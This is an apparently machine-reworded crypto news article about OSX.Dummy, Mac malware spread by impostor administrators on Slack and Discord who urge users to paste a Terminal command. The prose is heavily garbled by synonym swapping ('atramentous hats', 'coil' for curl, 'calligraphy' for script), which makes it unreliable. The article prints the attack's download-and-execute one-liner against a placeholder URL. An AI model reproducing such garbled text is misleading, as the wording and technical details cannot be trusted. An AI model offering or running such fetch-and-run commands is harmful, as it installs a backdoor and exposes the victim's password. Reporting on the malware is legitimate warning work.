THELOGICALINDIAN - Mac miners beware atramentous hats are attempting to infectmachines with malware that has been dubbed OSXDummy
Dumb Malware Created to Trap Dumb Mac Users
Crypto enthusiasts who admission altercation channels application Slack, Discord and possibly added messaging platforms be forewarned that if application a Mac addition may be aggravating to allurement you into a trap. The culprits are impersonating administrators on the platforms and auspicious associates to archetype and adhesive the continued command into a Terminal window on their machines. The command establishes a alien affiliation which can act as a backdoor for the antagonist already it downloads and executes the 34-megabyte book malware.
The command, below, would download a bifold named “script” to the /tmp folder and again ran it as root.
cd /tmp && coil -s coil $MALICIOUS_URL > calligraphy && chmod x calligraphy && ./script
Mac malware able Patrick Wardle advised the bug and called it “OSX.Dummy” as appear by ars Technica, area he bankrupt it bottomward to all its impaired aspects:
the infection adjustment is dumb
the massive admeasurement of the bifold is dumb
the chain apparatus is bruised (and appropriately additionally dumb)
the capabilities are rather bound (and appropriately rather dumb)
it’s atomic to ascertain at every footfall (that dumb)
… and finally, the malware saves the user’s countersign to dumpdummy
The malware was apparent aftermost week by Remco Verhoef, an ISC SANS abettor and architect of DutchSec. Thomas Reed, one of several Mac malware experts who analyzed the infection said,
“We don’t yet apperceive absolutely what the hacker(s) abaft the malware may intend to do with admission to the adulterated machines, but accustomed the actuality that cryptocurrency mining communities were targeted, it’s a fair bet that they were absorbed in annexation of cryptocurrency,”
Mac Cryptocurrency Miners Targeted
Wardle warned that the victim’s macOS basis password being adored as cleartext in the file /Users/Shared/dumpdummy and /tmp/dumpdummy, will best acceptable be acclimated for awful action in the future.
All three experts accede that the malware is basal in its action but that alike if users abolish the OSX.Dummy malware the book may abide if the infection isn’t cleaned out of the apparatus properly.
As Reed detailed, “Future malware could be advised to acquisition the locations of these files created by the [OSX.Dummy] malware, accepting admission to your countersign for free,” Adding in his blog column that “if users are so absent-minded and blind of the dangers of active cipher they affected from an online forum, they best acceptable accept no clue about aegis best practices to activate with.”
